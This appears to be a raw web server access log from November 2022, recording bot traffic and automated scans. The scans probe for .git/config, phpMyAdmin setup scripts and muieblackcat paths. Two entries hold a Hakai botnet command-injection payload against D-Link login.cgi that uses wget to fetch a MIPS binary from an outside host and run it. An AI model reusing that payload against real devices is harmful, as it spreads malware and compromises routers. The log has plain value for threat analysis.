103.240.161.100 - - [04/Nov/2022:03:35:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
141.255.166.2 - - [04/Nov/2022:03:40:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
183.136.225.32 - - [04/Nov/2022:03:41:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.32 - - [04/Nov/2022:03:41:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [04/Nov/2022:03:41:35 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [04/Nov/2022:03:41:36 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
130.211.54.158 - - [04/Nov/2022:03:42:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
185.16.38.231 - - [04/Nov/2022:03:43:05 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174"
75.67.32.138 - - [04/Nov/2022:03:46:37 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
172.91.47.43 - - [04/Nov/2022:03:46:50 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
167.99.119.114 - - [04/Nov/2022:03:48:15 +0100] "\x16\x03\x01" 501 318 "-" "-"
167.99.119.114 - - [04/Nov/2022:03:48:15 +0100] "\x16\x03\x01" 501 318 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:51:57 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:51:57 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:51:57 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:51:57 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:51:58 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:51:58 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:53:32 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:53:32 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:53:32 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:53:32 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:53:32 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:53:32 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
45.227.254.54 - - [04/Nov/2022:03:54:13 +0100] "\x03" 501 316 "-" "-"
47.87.142.219 - - [04/Nov/2022:03:59:39 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
47.87.142.219 - - [04/Nov/2022:03:59:39 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
47.87.142.219 - - [04/Nov/2022:03:59:41 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "ZmEu"
47.87.142.219 - - [04/Nov/2022:03:59:48 +0100] "GET /php/scripts/setup.php HTTP/1.1" 404 326 "-" "ZmEu"
47.87.142.219 - - [04/Nov/2022:03:59:54 +0100] "GET /wordpress/wp-content/plugins/wp-phpmyadmin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 376 "-" "ZmEu"
47.87.142.219 - - [04/Nov/2022:03:59:58 +0100] "GET /scripts/setup.php HTTP/1.1" 404 322 "-" "ZmEu"
205.210.31.33 - - [04/Nov/2022:04:03:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
41.216.183.144 - - [04/Nov/2022:04:05:05 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
41.216.183.144 - - [04/Nov/2022:04:05:05 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
